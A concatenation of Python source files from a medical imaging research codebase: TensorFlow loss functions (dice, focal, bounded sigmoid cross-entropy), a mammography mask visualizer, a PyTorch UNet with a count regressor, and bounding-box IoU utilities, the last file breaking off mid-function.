difference = tf.reshape(difference, [-1])
cross_entropy = tf.map_fn(l2_4_loss_fn, difference)
cross_entropy = tf.reshape(cross_entropy, orig_shape)
elif type == 'flat_bottom_l3_distance':
def l3_loss_fn(d):
# This maps scalar tensor (rank-0 tensor) to scalar
return tf.case(
pred_fn_pairs=[
(d > 1, lambda: (d - 1) ** 3),
(d < -1, lambda: -(d + 1) ** 3)],
default=lambda: tf.constant(0, dtype=tf.float32), exclusive=True)
difference = labels - logits
orig_shape = tf.shape(difference) # NB. a.get_shape() is equivalent to a.shape and returns static shape
difference = tf.reshape(difference, [-1])
cross_entropy = tf.map_fn(l3_loss_fn, difference)
cross_entropy = tf.reshape(cross_entropy, orig_shape)
elif type == 'l4_log_loss':
def l4_log_loss_fn(d):
# This maps scalar tensor (rank-0 tensor) to scalar
return tf.case(
pred_fn_pairs=[
(tf.abs(d) <= 1, lambda: (d ** 4)/12)],
default=lambda: -tf.log((4-tf.abs(d))/4) + 1/12 - tf.log(4/3), exclusive=True)
difference = labels - logits
orig_shape = tf.shape(difference) # NB. a.get_shape() is equivalent to a.shape and returns static shape
difference = tf.reshape(difference, [-1])
cross_entropy = tf.map_fn(l4_log_loss_fn, difference)
cross_entropy = tf.reshape(cross_entropy, orig_shape)
elif type == 'dice':
predictions = tf.nn.sigmoid(logits)
dice_numerator_1 = tf.reduce_sum(tf.multiply(labels, predictions), axis=0) + EPSILON
dice_denominator_1 = tf.reduce_sum(predictions, axis=0) + tf.reduce_sum(labels, axis=0) + EPSILON
dice_numerator_2 = tf.reduce_sum(tf.multiply((1 - labels), (1 - predictions)), axis=0) + EPSILON
dice_denominator_2 = tf.reduce_sum((1 - predictions), axis=0) + tf.reduce_sum((1 - labels),
axis=0) + EPSILON
cross_entropy = 1 - (tf.div(dice_numerator_1, dice_denominator_1)
- pos_weight_factor * tf.div(dice_numerator_2, dice_denominator_2))
elif type == 'dice_2_class':
predictions = tf.nn.softmax(logits)
dice_numerator_1 = tf.reduce_sum(tf.multiply(labels, tf.slice(predictions, [0,0], [-1, 1])), axis=0) + EPSILON
dice_denominator_1 = (tf.reduce_sum(tf.slice(predictions, [0,0], [-1, 1]), axis=0)
+ tf.reduce_sum(labels, axis=0) + EPSILON)
dice_numerator_2 = tf.reduce_sum(tf.multiply((1 - labels), tf.slice(predictions, [0,1], [-1, 1])), axis=0) + EPSILON
dice_denominator_2 = (tf.reduce_sum(tf.slice(predictions, [0,1], [-1, 1]), axis=0)
+ tf.reduce_sum((1 - labels), axis=0) + EPSILON)
cross_entropy = 1 - (tf.div(dice_numerator_1, dice_denominator_1)
- pos_weight_factor * tf.div(dice_numerator_2, dice_denominator_2))
else:
        raise ValueError('Unknown loss function type {}'.format(type))
cross_entropy_mean = tf.reduce_mean(cross_entropy)
regularization_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
loss_ = tf.add_n([cross_entropy_mean] + regularization_losses)
# tf.summary.scalar('loss', loss_) # add to summary when loss() is called
return loss_
def focal_loss(prediction_tensor, target_tensor, alpha=0.5, gamma_p=2.0, gamma_n=2.0):
"""Compute focal loss for predictions
Multi-labels Focal loss formula:
        FL = -alpha * (z-p)^gamma_p * log(p) - (1-alpha) * p^gamma_n * log(1-p)
    where alpha = 0.25, gamma_p = gamma_n = 2 by default, p = sigmoid(x), z = target_tensor.
Ref: https://arxiv.org/pdf/1708.02002.pdf
Args:
prediction_tensor: A float tensor of shape [batch_size, num_anchors,
num_classes] representing the predicted logits for each class
target_tensor: A float tensor of shape [batch_size, num_anchors,
num_classes] representing one-hot encoded classification targets
alpha: A scalar tensor for focal loss alpha hyper-parameter
        gamma_p: A scalar tensor for the focal loss gamma hyper-parameter applied to positive targets
        gamma_n: A scalar tensor for the focal loss gamma hyper-parameter applied to negative targets
Returns:
loss: A (scalar) tensor representing the value of the loss function
"""
sigmoid_p = tf.nn.sigmoid(prediction_tensor)
zeros = array_ops.zeros_like(sigmoid_p, dtype=sigmoid_p.dtype)
# when target_tensor == 1, pos_p_sub = 1 - sigmoid_p
pos_p_sub = array_ops.where(target_tensor >= sigmoid_p, target_tensor - sigmoid_p, zeros)
# when target_tensor == 0, neg_p_sub = sigmoid_p
neg_p_sub = array_ops.where(target_tensor > zeros, zeros, sigmoid_p)
per_entry_cross_ent = - alpha * (pos_p_sub ** gamma_p) * tf.log(tf.clip_by_value(sigmoid_p, 1e-8, 1.0)) \
- (1 - alpha) * (neg_p_sub ** gamma_n) * tf.log(tf.clip_by_value(1.0 - sigmoid_p, 1e-8, 1.0))
return per_entry_cross_ent
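# Note (illustrative): focal_loss returns a per-element loss tensor with the same shape as
# `prediction_tensor`; callers typically flatten and reduce it, as loss() does above.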
def bounded_sigmoid_cross_entropy_with_logits(
labels=None,
logits=None,
epsilon=0.0,
name=None):
"""Computes sigmoid cross entropy given `logits` with a `bound` (b) away from 0 and 1 when computing log(x).
Modified based on tf.nn.sigmoid_cross_entropy_with_logits()
For brevity, let `x = logits`, `z = labels`. The logistic loss is
z * -log(b + sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x) + b)
= z * -log(1 / (1 + exp(-x))) + (1 - z) * -log(exp(-x) / (1 + exp(-x)))
= z * log(1 + exp(-x)) + (1 - z) * (-log(exp(-x)) + log(1 + exp(-x)))
= z * log(1 + exp(-x)) + (1 - z) * (x + log(1 + exp(-x))
= (1 - z) * x + log(1 + exp(-x))
= x - x * z + log(1 + exp(-x))
For x < 0, to avoid overflow in exp(-x), we reformulate the above
x - x * z + log(1 + exp(-x))
= log(exp(x)) - x * z + log(1 + exp(-x))
= - x * z + log(1 + exp(x))
Hence, to ensure stability and avoid overflow, the implementation uses this
equivalent formulation
max(x, 0) - x * z + log(1 + exp(-abs(x)))
`logits` and `labels` must have the same type and shape.
Args:
labels: A `Tensor` of the same type and shape as `logits`.
logits: A `Tensor` of type `float32` or `float64`.
name: A name for the operation (optional).
Returns:
A `Tensor` of the same shape as `logits` with the componentwise
logistic losses.
Raises:
ValueError: If `logits` and `labels` do not have the same shape.
"""
with ops.name_scope(name, "logistic_loss", [logits, labels]) as name:
logits = ops.convert_to_tensor(logits, name="logits")
labels = ops.convert_to_tensor(labels, name="labels")
try:
labels.get_shape().merge_with(logits.get_shape())
except ValueError:
raise ValueError("logits and labels must have the same shape (%s vs %s)" %
(logits.get_shape(), labels.get_shape()))
# The logistic loss formula from above is
# x - x * z + log(1 + exp(-x))
# For x < 0, a more numerically stable formula is
# -x * z + log(1 + exp(x))
# Note that these two expressions can be combined into the following:
# max(x, 0) - x * z + log(1 + exp(-abs(x)))
# To allow computing gradients at zero, we define custom versions of max and
# abs functions.
zeros = array_ops.zeros_like(logits, dtype=logits.dtype)
cond = (logits >= zeros)
# relu_logits = array_ops.where(cond, logits, zeros)
neg_abs_logits = array_ops.where(cond, -logits, logits)
out_negative = math_ops.add(
math_ops.log1p(math_ops.exp(neg_abs_logits)),
math_ops.add(
-labels * math_ops.log(math_ops.add(epsilon, math_ops.exp(neg_abs_logits))),
-(1 - labels) * math_ops.log1p(epsilon * math_ops.exp(neg_abs_logits))
)
)
out_positive = math_ops.add(
math_ops.log1p(math_ops.exp(neg_abs_logits)),
math_ops.add(
-labels * math_ops.log1p(epsilon * math_ops.exp(neg_abs_logits)),
-(1 - labels) * math_ops.log(math_ops.add(epsilon, math_ops.exp(neg_abs_logits)))
)
)
return array_ops.where(cond, out_positive, out_negative)
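# --- Illustrative sketch (not part of the original module) --------------------
# Quick numpy check of the numerically stable formulation derived in the
# docstring above for the epsilon = 0 case:
#     max(x, 0) - x * z + log(1 + exp(-abs(x)))
# agrees with the naive -z*log(sigmoid(x)) - (1-z)*log(1-sigmoid(x)) for
# moderate logits. The helper name and inputs are hypothetical.
def _stable_logistic_loss_check(x, z):
    import numpy as np
    x = np.asarray(x, dtype=np.float64)
    z = np.asarray(z, dtype=np.float64)
    stable = np.maximum(x, 0) - x * z + np.log1p(np.exp(-np.abs(x)))
    p = 1.0 / (1.0 + np.exp(-x))
    naive = -z * np.log(p) - (1 - z) * np.log(1 - p)
    return np.allclose(stable, naive)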
def nan_guard(x):
"""Replace NaN with 0
Args:
x: a Tensor
Returns:
A Tensor, replaced with 0 if NaN
"""
# tf.cond needs a scalar predicate; tf.where zeros out NaN entries elementwise
# and works for tensors of any shape (including scalars)
return tf.where(tf.is_nan(x), tf.zeros_like(x), x)
def none_guard(x):
    """Replace None with a constant Tensor 0
    Args:
        x: a Tensor or None
    Returns:
        A Tensor: a constant 0 if x is None, otherwise x unchanged
    """
    # `x is None` is a plain Python check, so no graph op (tf.cond) is needed here
    return tf.constant(0) if x is None else x
<file_sep>"""This file contains utility functions used for mask annotation visualization"""
import os
import numpy as np
import argparse
from skimage import measure
import glob2
from tqdm import tqdm
import matplotlib.pylab as plt
import sys
sys.path.append('/data/SigmaPy/projects/mammo_seg/mask_rcnn/')
from projects.mammo_seg.mask_rcnn.mrcnn import visualize
from projects.drutils import fileio
from projects.drutils import roc
class MaskVisualizer(object):
"""Visualize mask annotations"""
def __init__(self, config):
self.output_dir = config['output_dir']
self.class_names = config['class_names']
self.class_name_fn = config['class_name_fn']
self.filter_keys = config['filter_keys']
self.show_orig = config['show_orig']
self.subplot_size = config['subplot_size']
@staticmethod
def get_box_from_mask(mask):
y_range, x_range = np.where(mask > 0)
x_min, x_max = np.min(x_range), np.max(x_range)
y_min, y_max = np.min(y_range), np.max(y_range)
return y_min, x_min, y_max, x_max
def get_images_and_annotation(self, png_path, mask_path_list, class_names, parse_path_fn):
"""
parse_path_fn: function to parse class_name from path
"""
image = plt.imread(png_path, -1)
image_3ch = np.dstack([image] * 3)
masks = []
boxes = []
class_ids = []
if type(mask_path_list) == str:
mask_path_list = [mask_path_list]
if mask_path_list:
for mask_path in mask_path_list:
mask = plt.imread(mask_path, -1).astype(np.bool)
# connected component analysis
labeled_mask_array = measure.label(mask, connectivity=2)
for i in range(np.max(labeled_mask_array)):
mask = (labeled_mask_array == i + 1)
masks.append(mask)
box = self.get_box_from_mask(mask)
boxes.append(box)
class_name = parse_path_fn(mask_path)
class_id = class_names.tolist().index(class_name)
class_ids.append(class_id)
masks = np.dstack(masks)
masks = np.array(masks)
boxes = np.array(boxes)
class_ids = np.array(class_ids)
return image_3ch, boxes, masks, class_ids
@staticmethod
def visualize_multiple_gt(image_3ch, boxes_dict, masks_dict, class_ids_dict, class_names, key,
fig_dir=None,
show_orig=False,
subplot_size=(16, 16)):
assert set(boxes_dict.keys()) == set(masks_dict.keys()) == set(class_ids_dict.keys())
n_annotation_series = len(boxes_dict.keys())
if show_orig:
# show original image without annotation
axes = roc.get_ax(1, n_annotation_series + 1, size=subplot_size)
ax, axes = axes[0], axes[1:]
empty_array = np.array([])
visualize.display_instances(image=image_3ch,
boxes=empty_array,
masks=empty_array,
class_ids=empty_array,
class_names=class_names,
show_mask=False,
show_bbox=False,
ax=ax,
title='orig image',
verbose=False)
else:
axes = roc.get_ax(1, n_annotation_series)
series_keys = boxes_dict.keys()
assert len(axes) == len(series_keys)
for idx, (ax, series_key) in enumerate(zip(axes, series_keys)):
# Display GT bbox and mask
visualize.display_instances(image=image_3ch,
boxes=boxes_dict[series_key],
masks=masks_dict[series_key],
class_ids=class_ids_dict[series_key],
class_names=class_names,
ax=ax,
title=series_key,
verbose=False)
# Save to model log dir
fig_dir = fig_dir or '/tmp/tmp/'
fileio.maybe_make_new_dir(fig_dir)
fig_path = os.path.join(fig_dir, 'gt_{}.png'.format(key))
plt.savefig(fig_path, bbox_inches='tight')
plt.close('all')
def _get_keys(self, png_dict, mask_dict):
mask_dict_keys = set()
for annotation_series in mask_dict.keys():
mask_dict_keys |= set(mask_dict[annotation_series].keys())
keys = list(set(mask_dict_keys) & set(png_dict.keys()))
if self.filter_keys is not None:
keys = list(set(keys) & set(self.filter_keys))
keys = sorted(keys)
return keys
def _get_dicts(self, png_dict, mask_dict, key):
# populate boxes_dict, masks_dict, class_id_dict
boxes_dict = {}
masks_dict = {}
class_ids_dict = {}
for data_series_key in list(mask_dict.keys())[:]:
png_path = png_dict[key]
mask_path_list = mask_dict[data_series_key].get(key, [])
(image_3ch,
boxes_dict[data_series_key],
masks_dict[data_series_key],
class_ids_dict[data_series_key]) = self.get_images_and_annotation(
png_path, mask_path_list, self.class_names, parse_path_fn=self.class_name_fn)
return image_3ch, boxes_dict, masks_dict, class_ids_dict
def process(self, png_dict, mask_dict):
# batch generating stack images
keys = self._get_keys(png_dict, mask_dict)
for key in tqdm(keys[:]):
# populate boxes_dict, masks_dict, class_id_dict
image_3ch, boxes_dict, masks_dict, class_ids_dict = self._get_dicts(png_dict, mask_dict, key)
# visualize
self.visualize_multiple_gt(image_3ch, boxes_dict, masks_dict, class_ids_dict, self.class_names, key,
fig_dir=self.output_dir,
show_orig=self.show_orig,
subplot_size=self.subplot_size)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--test', action='store_true')
args = parser.parse_args()
if args.test:
png_search_path = '/data/log/test/AllPNG/**/*png'
mask_search_path1 = '/data/log/mammo/calc_cluster/above_100/**/*png'
output_dir = '/data/log/test/'
filter_txt = None
dir_key_fn = lambda x: '-'.join(x.split(os.sep)[-3:-1])
file_key_fn = lambda x: os.path.basename(x).split('.')[0].split('_')[0]
mask_dict1 = {file_key_fn(x): x for x in glob2.glob(mask_search_path1)}
mask_dict = {'combined': mask_dict1, 'combined2': mask_dict1}
png_dict = {file_key_fn(x): x for x in glob2.glob(png_search_path)}
if filter_txt is not None:
filter_keys = [file_key_fn(x) for x in fileio.read_list_from_txt(filter_txt)]
else:
filter_keys = None
config = {}
config['output_dir'] = output_dir
config['class_name_fn'] = lambda x: 'mass'
config['class_names'] = np.array(['mass'])
config['key_fn'] = lambda x: os.path.basename(x).split('.')[0].split('_')[0]
config['png_search_path'] = png_search_path
config['filter_keys'] = filter_keys
config['show_orig'] = True
config['subplot_size'] = (20, 30)
visualizer = MaskVisualizer(config=config)
visualizer.process(png_dict, mask_dict)<file_sep>__copyright__ = \
"""
Copyright (c) 2019 The Board of Trustees of Purdue University and the Purdue Research Foundation.
All rights reserved.
This software is covered by US patents and copyright.
This source code is to be used for academic research purposes only, and no commercial use is allowed.
For any questions, please contact <NAME> (<EMAIL>) at Purdue University.
Last Modified: 03/03/2019
"""
__license__ = "CC BY-NC-SA 4.0"
__authors__ = "<NAME>, <NAME>, <NAME>, <NAME>"
__version__ = "1.5.1"
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from .unet_parts import *
class UNet(nn.Module):
def __init__(self, n_channels, n_classes,
height, width,
known_n_points=None,
device=torch.device('cuda')):
super(UNet, self).__init__()
self.device = device
# With this network depth, there is a minimum image size
if height < 256 or width < 256:
raise ValueError('Minimum input image size is 256x256, got {}x{}'.\
format(height, width))
self.inc = inconv(n_channels, 64)
self.down1 = down(64, 128)
self.down2 = down(128, 256)
self.down3 = down(256, 512)
self.down4 = down(512, 512)
self.down5 = down(512, 512)
self.down6 = down(512, 512)
self.down7 = down(512, 512)
self.down8 = down(512, 512, normaliz=False)
self.up1 = up(1024, 512)
self.up2 = up(1024, 512)
self.up3 = up(1024, 512)
self.up4 = up(1024, 512)
self.up5 = up(1024, 256)
self.up6 = up(512, 128)
self.up7 = up(256, 64)
self.up8 = up(128, 64, activ=False)
self.outc = outconv(64, n_classes)
self.out_nonlin = nn.Sigmoid() # to solve the weird predicted-map problem @ 20190924 Xing
self.known_n_points = known_n_points
if known_n_points is None:
self.branch_1 = nn.Sequential(nn.Linear(512, 64),
nn.ReLU(inplace=True),
nn.Dropout(p=0.5))
self.branch_2 = nn.Sequential(nn.Linear(256*256, 64),
nn.ReLU(inplace=True),
nn.Dropout(p=0.5))
self.regressor = nn.Sequential(nn.Linear(64 + 64, 1),
nn.ReLU())
# This layer is not connected anywhere
# It is only here for backward compatibility
self.lin = nn.Linear(1, 1, bias=False)
def forward(self, x):
batch_size = x.shape[0]
print(batch_size)
x1 = self.inc(x)
x2 = self.down1(x1)
x3 = self.down2(x2)
x4 = self.down3(x3)
x5 = self.down4(x4)
x6 = self.down5(x5)
x7 = self.down6(x6)
x8 = self.down7(x7)
x9 = self.down8(x8)
x = self.up1(x9, x8)
x = self.up2(x, x7)
x = self.up3(x, x6)
x = self.up4(x, x5)
x = self.up5(x, x4)
x = self.up6(x, x3)
x = self.up7(x, x2)
x = self.up8(x, x1)
x = self.outc(x)
x = self.out_nonlin(x) # apply the sigmoid so the output is a probability map (20190924, Xing)
# Reshape Bx1xHxW -> BxHxW
# because probability map is real-valued by definition
x = x.squeeze(1)
# x_map = x_map.squeeze(1)
# print(x_map,x)
if self.known_n_points is None:
x9_flat = x9.view(batch_size, -1)
x_flat = x.view(batch_size, -1)
print(x9_flat.shape)
x10_flat = self.branch_1(x9_flat)
x_flat = self.branch_2(x_flat)
regression_features = torch.cat((x_flat, x10_flat), dim=1)
regression = self.regressor(regression_features)
return x, regression
else:
n_pts = torch.tensor([self.known_n_points]*batch_size,
dtype=torch.get_default_dtype())
n_pts = n_pts.to(self.device)
return x, n_pts
# summ = torch.sum(x)
# count = self.lin(summ)
# count = torch.abs(count)
# if self.known_n_points is not None:
# count = Variable(torch.cuda.FloatTensor([self.known_n_points]))
# return x, count
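# --- Illustrative sketch (not part of the original module) --------------------
# A minimal, hypothetical usage of the UNet above: build it on CPU and run one
# forward pass on a dummy 256x256 single-channel image. This assumes the
# companion `unet_parts` module (inconv/down/up/outconv) is importable, as in
# the original repository.
def _unet_forward_sketch():
    model = UNet(n_channels=1, n_classes=1, height=256, width=256,
                 device=torch.device('cpu'))
    dummy = torch.zeros(1, 1, 256, 256)       # (batch, channels, H, W)
    prob_map, regression = model(dummy)       # known_n_points defaults to None
    return prob_map.shape, regression.shape   # expected: (1, 256, 256) and (1, 1)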
"""
Copyright (c) 2019 The Board of Trustees of Purdue University and the Purdue Research Foundation.
All rights reserved.
This software is covered by US patents and copyright.
This source code is to be used for academic research purposes only, and no commercial use is allowed.
For any questions, please contact <NAME> (<EMAIL>) at Purdue University.
Last Modified: 03/03/2019
"""
<file_sep>"""This file contains utility functions used for bbox"""
import logging
import matplotlib.pylab as plt
import numpy as np
import os
import cv2
from tqdm import tqdm
from skimage import measure
# import matplotlib
# matplotlib.rcParams['figure.dpi'] = 150
from projects.drutils import fileio
# from projects.drutils import patch #when doing froc in object detector
from projects.drutils import augmentation
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s')
def calc_intersection(bbox_1, bbox_2):
"""Calculate the IOU (Intersection Over Union) given two set of bbox coordinates
All coordinates are in the order of (ymin, xmin, ymax, xmax), following the convention in `tf_example_decoder.py`
Args:
bbox_1: coordinates of bbox1
bbox_2: coordinates of bbox2
Returns:
x_intersection: the intersected x length
y_intersection: the intersected y length
"""
assert len(bbox_1) == len(bbox_2)
if len(bbox_1) == 4:
ymin, xmin, ymax, xmax = bbox_1
ymin_2, xmin_2, ymax_2, xmax_2 = bbox_2
assert ymax >= ymin and ymax_2 >= ymin_2 and xmax >= xmin and xmax_2 >= xmin_2, 'Please check coordinate input!'
x_intersection = max(min(xmax, xmax_2) - max(xmin, xmin_2), 0)
y_intersection = max(min(ymax, ymax_2) - max(ymin, ymin_2), 0)
return (x_intersection, y_intersection)
elif len(bbox_1) == 2:
xmin, xmax = bbox_1
xmin_2, xmax_2 = bbox_2
assert xmax >= xmin and xmax_2 >= xmin_2, 'Please check coordinate input!'
x_intersection = max(min(xmax, xmax_2) - max(xmin, xmin_2), 0)
return x_intersection
else:
raise ValueError('Input bbox size must be 2 or 4.')
def calc_iou_1d(bbox_1, bbox_2):
"""Calculate the 1-dimensional IOU (Intersection Over Union) given two set of bbox coordinates
All coordinates are in the order of (ymin, xmin, ymax, xmax), following the convention in `tf_example_decoder.py`
Args:
bbox_1: coordinates of bbox1
bbox_2: coordinates of bbox2
Returns:
iou: the intersection over union
"""
xmin, xmax = bbox_1
xmin_2, xmax_2 = bbox_2
assert xmax >= xmin and xmax_2 >= xmin_2, 'Please check coordinate input!'
x_intersection = calc_intersection(bbox_1, bbox_2)
area_intersection = x_intersection
area_1 = xmax - xmin
area_2 = xmax_2 - xmin_2
area_union = area_1 + area_2 - area_intersection
if area_union == 0:
return 0
iou = area_intersection / area_union
return iou
def calc_iou(bbox_1, bbox_2):
"""Calculate the IOU (Intersection Over Union) given two set of bbox coordinates
All coordinates are in the order of (ymin, xmin, ymax, xmax), following the convention in `tf_example_decoder.py`
Args:
bbox_1: coordinates of bbox1
bbox_2: coordinates of bbox2
Returns:
iou: the intersection over union
"""
ymin, xmin, ymax, xmax = bbox_1
ymin_2, xmin_2, ymax_2, xmax_2 = bbox_2
assert ymax > ymin and ymax_2 > ymin_2 and xmax > xmin and xmax_2 > xmin_2, 'Please check coordinate input!'
x_intersection, y_intersection = calc_intersection(bbox_1, bbox_2)
area_intersection = x_intersection * y_intersection
area_1 = (xmax - xmin) * (ymax - ymin)
area_2 = (xmax_2 - xmin_2) * (ymax_2 - ymin_2)
area_union = area_1 + area_2 - area_intersection
iou = area_intersection / area_union
return iou
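# --- Illustrative sketch (not part of the original module) --------------------
# Tiny worked example for calc_iou: two 10x10 boxes offset by 5 pixels in x
# share a 5x10 strip, so intersection = 50, union = 100 + 100 - 50 = 150 and
# IoU = 1/3. Box values are hypothetical.
def _calc_iou_example():
    bbox_a = (0, 0, 10, 10)    # (ymin, xmin, ymax, xmax)
    bbox_b = (0, 5, 10, 15)
    return calc_iou(bbox_a, bbox_b)   # -> 50 / 150 ~= 0.333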
def calc_avg_iou(predictions, labels):
"""Compute average bbox IOU over a number of batches
Args:
predictions: Predictions matrix [num_batches, batch_size, 4 or 2]
labels: Labels matrix [num_batches, batch_size, 4 or 2]
Returns:
average IOU value
"""
num_batches, batch_size, num_coordinates = predictions.shape
assert num_coordinates == 4 or num_coordinates == 2
iou_per_sample = np.zeros((num_batches, batch_size))
for batch_id in range(num_batches):
for image_id in range(batch_size):
pred_array = np.array(predictions[batch_id, image_id, :])
label_array = np.array(labels[batch_id, image_id, :])
if num_coordinates == 4:
iou_per_sample[batch_id, image_id] = calc_iou(pred_array, label_array)
elif num_coordinates == 2:
iou_per_sample[batch_id, image_id] = calc_iou_1d(pred_array, label_array)
return np.mean(iou_per_sample)
def calc_ios(bbox_1, bbox_2):
"""Calculate intersection over small ratio
This is a variant of more commonly used IoU (intersection over union) metric
All coordinates are in the order of (ymin, xmin, ymax, xmax)
Args:
bbox_1:
bbox_2:
Returns:
ios: intersection area divided by the smaller of the two bbox areas
"""
def cal_area(bbox):
# calculate the area for a bbox in format (y_min, x_min, y_max, x_max)
return max(bbox[2] - bbox[0], 0) * max(bbox[3] - bbox[1], 0)
ymin_1, xmin_1, ymax_1, xmax_1 = bbox_1
ymin_2, xmin_2, ymax_2, xmax_2 = bbox_2
x_min = max(xmin_1, xmin_2)
y_min = max(ymin_1, ymin_2)
x_max = min(xmax_1, xmax_2)
y_max = min(ymax_1, ymax_2)
area_intersection = cal_area([y_min, x_min, y_max, x_max])
area_small = min(cal_area(bbox_1), cal_area(bbox_2))
ios = area_intersection / area_small
return ios
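# --- Illustrative sketch (not part of the original module) --------------------
# calc_ios vs calc_iou on a small box fully contained in a larger one: the
# intersection-over-small ratio is 1.0 (the small box is completely covered)
# while the IoU is only 25/100. Box values are hypothetical.
def _calc_ios_example():
    big = (0, 0, 10, 10)      # (ymin, xmin, ymax, xmax), area 100
    small = (2, 2, 7, 7)      # area 25, fully inside `big`
    return calc_ios(big, small), calc_iou(big, small)   # -> (1.0, 0.25)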
def is_overlapped(pred_bbox, gt_bbox,
overlap_method='gt_center_in_pred',
iou_threshold=0, relative_lateral_threshold=0.9):
"""To tell if there is overlap between perd_bbox and gt_bbox
TODO: 3D version in evaluation tools sigmaLU
TODO: switching between 2D/3D based on the input shape
TODO: add assertion of cases tested
All coordinates are in the order of (ymin, xmin, ymax, xmax), following the convention in `tf_example_decoder.py`
Args:
pred_bbox: four predicted coordinates
gt_bbox: four GT coordinates
overlap_method: defaults to `gt_center_in_pred`, could be
    gt_center_in_pred: the GT bbox center falls inside the predicted bbox
    pred_center_in_gt: the predicted bbox center falls inside the GT bbox
    either_center_in_other / both_center_in_other: either / both of the two conditions above
    iou: IoU of the two bboxes >= iou_threshold
    relative_lateral_overlap: per-axis overlap relative to the smaller extent > relative_lateral_threshold
Return:
is_overlapped: True if is_overlapped, False otherwise
"""
ymin, xmin, ymax, xmax = pred_bbox
gt_ymin, gt_xmin, gt_ymax, gt_xmax = gt_bbox
xcenter = (xmin + xmax) // 2
ycenter = (ymin + ymax) // 2
gt_xcenter = (gt_xmin + gt_xmax) // 2
gt_ycenter = (gt_ymin + gt_ymax) // 2
if overlap_method == 'gt_center_in_pred':
is_overlapped = (xmin <= gt_xcenter <= xmax and ymin <= gt_ycenter <= ymax)
elif overlap_method == 'pred_center_in_gt':
is_overlapped = (gt_xmin <= xcenter <= gt_xmax and gt_ymin <= ycenter <= gt_ymax)
elif overlap_method == 'either_center_in_other':
is_overlapped = ((xmin <= gt_xcenter <= xmax and ymin <= gt_ycenter <= ymax) or
(gt_xmin <= xcenter <= gt_xmax and gt_ymin <= ycenter <= gt_ymax))
elif overlap_method == 'both_center_in_other':
is_overlapped = ((xmin <= gt_xcenter <= xmax and ymin <= gt_ycenter <= ymax) and
(gt_xmin <= xcenter <= gt_xmax and gt_ymin <= ycenter <= gt_ymax))
elif overlap_method == 'iou':
is_overlapped = (calc_iou(pred_bbox, gt_bbox) >= iou_threshold)
elif overlap_method == 'relative_lateral_overlap':
x_intersection, y_intersection = calc_intersection(pred_bbox, gt_bbox)
is_overlapped = (x_intersection / min(xmax - xmin, gt_xmax - gt_xmin) > relative_lateral_threshold) and (
y_intersection / min(ymax - ymin, gt_ymax - gt_ymin) > relative_lateral_threshold)
else:
raise ValueError('Unknown overlap_method {}'.format(overlap_method))
return is_overlapped
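# --- Illustrative sketch (not part of the original module) --------------------
# How the overlap_method choices in is_overlapped() can disagree: here the GT
# center lies inside the prediction, but the IoU (16/100) is below a 0.5
# threshold. Box values are hypothetical.
def _is_overlapped_example():
    pred = (0, 0, 10, 10)   # (ymin, xmin, ymax, xmax)
    gt = (0, 0, 4, 4)       # small GT box in the corner of the prediction
    hit_by_center = is_overlapped(pred, gt, overlap_method='gt_center_in_pred')    # True
    hit_by_iou = is_overlapped(pred, gt, overlap_method='iou', iou_threshold=0.5)  # False
    return hit_by_center, hit_by_iou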
def is_bbox_list_overlapped(pred_bbox_list, gt_bbox_list, gt_class_list=[], **kwargs):
"""Check if the input bb overlaps with the list of groundtruth (GT) bbox.
Args:
pred_bbox_list:
gt_bbox_list:
gt_class_list:
Return:
is_pred_bbox_correct_list: a list of set containing the index of overlapped GT bbox
is_gt_bbox_covered_list: a list of set containing the index of overlapped pred bbox
"""
is_pred_bbox_correct_list = np.array([set() for _ in range(len(pred_bbox_list))])
is_gt_bbox_covered_list = np.array([set() for _ in range(len(gt_bbox_list))])
if not gt_class_list:
gt_class_list = [-1 for _ in range(len(gt_bbox_list))]
assert len(gt_class_list) == len(gt_bbox_list)
for idx_gt, (gt_bbox, gt_class) in enumerate(zip(gt_bbox_list, gt_class_list)):
for idx_pred, pred_bbox in enumerate(pred_bbox_list):
if is_overlapped(pred_bbox, gt_bbox, **kwargs):
is_gt_bbox_covered_list[idx_gt].add(idx_pred) # TODO: change this to pred classes
is_pred_bbox_correct_list[idx_pred].add(idx_gt)
# is_pred_bbox_correct_list = is_pred_bbox_correct_list.astype(bool)
# is_gt_bbox_covered_list = is_gt_bbox_covered_list.astype(bool)
return is_pred_bbox_correct_list, is_gt_bbox_covered_list
def draw_bb_and_test(image, rects, label='', color=(0, 255, 0),
line_thickness=2, font_scale=0.5, font_thickness=2):
"""
Draw bounding box and add text to image
Args:
image: input image
rects: bbox coordinates in the order of (x, y, w, h)
label: label text to annotate bbox
color: label color
line_thickness: bbox line thickness
font_scale: label text scale factor
font_thickness: label text thickness
Returns:
image: the modified image
"""
assert len(image.shape) == 3, 'images are expected to have 3 channels'
x, y, w, h = rects
# draw a rectangle surrounding the bbox and annotate it with the label text
cv2.rectangle(image, (x, y), (x + w, y + h), color, line_thickness)
cv2.putText(image, "{}".format(label), (x, y - 10),
cv2.FONT_HERSHEY_SIMPLEX, font_scale, color, font_thickness)
return image
def overlay_bbox_on_grayscale_image(image, rects, label='', color=(0, 255, 0), order='xywh', **kwargs):
"""
Convert grayscale image to RGB and then overlay bbox
Args:
image: grayscale image
rects: bbox coordinates in the order of (x, y, w, h)
order: order of bbox, 'xywh' or 'yminxmin'
Return:
image: the overlaid image with num_channels
"""
line_thickness = kwargs.get('line_thickness', 5)
font_scale = kwargs.get('font_scale', 2)
font_thickness = kwargs.get('font_thickness', 5)
if len(image.shape) == 2:
#image = cv2.cvtColor(image, cv2.COLOR_GRAY2RGB)
image = np.dstack([image] * 3)
assert len(image.shape) == 3, 'image must have 3 channels'
assert len(color) == 3, 'color must have 3 channels'
if order == 'yminxmin':
rects = convert_bbox_yminxmin_to_xywh(rects)
# Draw bbox and annotation
image = draw_bb_and_test(image, rects=rects,
label=label, color=color,
line_thickness=line_thickness,
font_scale=font_scale,
font_thickness=font_thickness)
return image
def overlay_bbox_list_on_image(image, rects_list, label_list=[], color=(0, 255, 0), order='yminxmin', **kwargs):
"""Overlay a list of bboxes on top of an image
Args:
image:
rects_list:
label_list:
color:
Returns:
image: rgb image with bbox overlay
"""
n_bbox = len(rects_list)
if len(label_list) == 0:
label_list = ['' for _ in range(n_bbox)]
elif len(label_list) == 1:
label = label_list[0]
label_list = [label for _ in range(n_bbox)]
else:
assert len(rects_list) == len(label_list), 'number of labels should agree with number of bboxes!'
if len(image.shape) == 2:
